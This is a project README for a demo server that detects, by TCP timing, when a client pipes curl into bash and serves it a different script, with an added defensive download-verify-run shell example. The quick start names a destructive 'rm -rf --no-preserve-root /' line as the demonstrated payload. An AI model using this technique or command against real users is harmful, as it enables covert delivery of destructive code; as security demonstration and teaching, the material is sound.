m4tx / curl-bash-attack

Server-side detection of using curl | bash in the CLI

curl-bash-attack

An implementation of an attack that detects, on the server side, that a client is running curl | bash, and serves a malicious script only to those users while everyone else receives a benign one.

The attack exploits the way bash executes a script read from a pipe: bash consumes the script incrementally as it runs, so a long-running command (such as sleep) stops the pipe from draining and stalls the TCP transfer. The server measures the time between consecutive TCP packets being received to distinguish curl | bash from simply downloading the script. More details on how the attack works can be found in the blog post.
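The side channel only exists because execution and download are interleaved, so the natural defence is to separate them: download the whole script to a file first, check it against a digest published out of band, and only then run it. The following POSIX shell functions are an added example written for this README (not code from the curl-bash-attack repository); the URL, the expected digest and the temporary-file handling are assumptions, and the test script they are run against below is constructed.

```shell
#!/bin/sh
# Added example, not part of the curl-bash-attack project: the defensive
# counterpart to "curl | bash". Downloading the complete script before
# executing anything makes the transfer look identical whether or not the
# client intends to run it, so a server cannot use execution stalls to
# decide which bytes to send. The digest check then catches a server that
# serves different content to different clients.

# Portable SHA-256 of a file (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Fetch the complete script into a file. --fail turns an HTTP error into a
# non-zero exit instead of a "script" that is really an error page.
# Nothing is executed in this step.
fetch_script() {
    curl --fail --silent --show-error --location --output "$2" "$1"
}

# Compare the downloaded file against a digest obtained out of band
# (for example from the project's release page). Succeeds only on an
# exact match.
verify_sha256() {
    actual=$(sha256_of "$1")
    [ "$actual" = "$2" ]
}

# Download, verify, and only then execute. Returns 1 on download failure,
# 2 on digest mismatch, otherwise the exit status of the script itself.
safe_install() {
    url=$1
    expected=$2
    tmp=$(mktemp) || return 1
    if ! fetch_script "$url" "$tmp"; then
        echo "download failed: $url" >&2
        rm -f "$tmp"
        return 1
    fi
    if ! verify_sha256 "$tmp" "$expected"; then
        echo "checksum mismatch; refusing to run $url" >&2
        echo "got:      $(sha256_of "$tmp")" >&2
        echo "expected: $expected" >&2
        rm -f "$tmp"
        return 2
    fi
    bash "$tmp"
    rc=$?
    rm -f "$tmp"
    return $rc
}
```

Usage is safe_install https://example.invalid/install.sh <expected-sha256>; the script runs only after the whole body has arrived and matched, which is also the point at which you can open the temporary file and read it yourself.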

Screencast

Quick Start

Make sure you have cargo installed before proceeding.

cargo run

After that, in another terminal, you can test the attack by running:

curl -s http://localhost:8080 | bash

You should see running rm -rf --no-preserve-root /... printed in the terminal. Don't worry, the command is not actually executed; it's just a demonstration of the attack!

For comparison, you can run the following command:

curl -s http://localhost:8080 | cat

You should just see the following script in the terminal:

echo Hello!
sleep 2
echo nothing to do...

License

The project is dual-licensed under the MIT and Apache-2.0 licenses.

Attribution

The attack is based on the blog post published on idontplaydarts.com.

The source code uses Flareon, an experimental web framework.
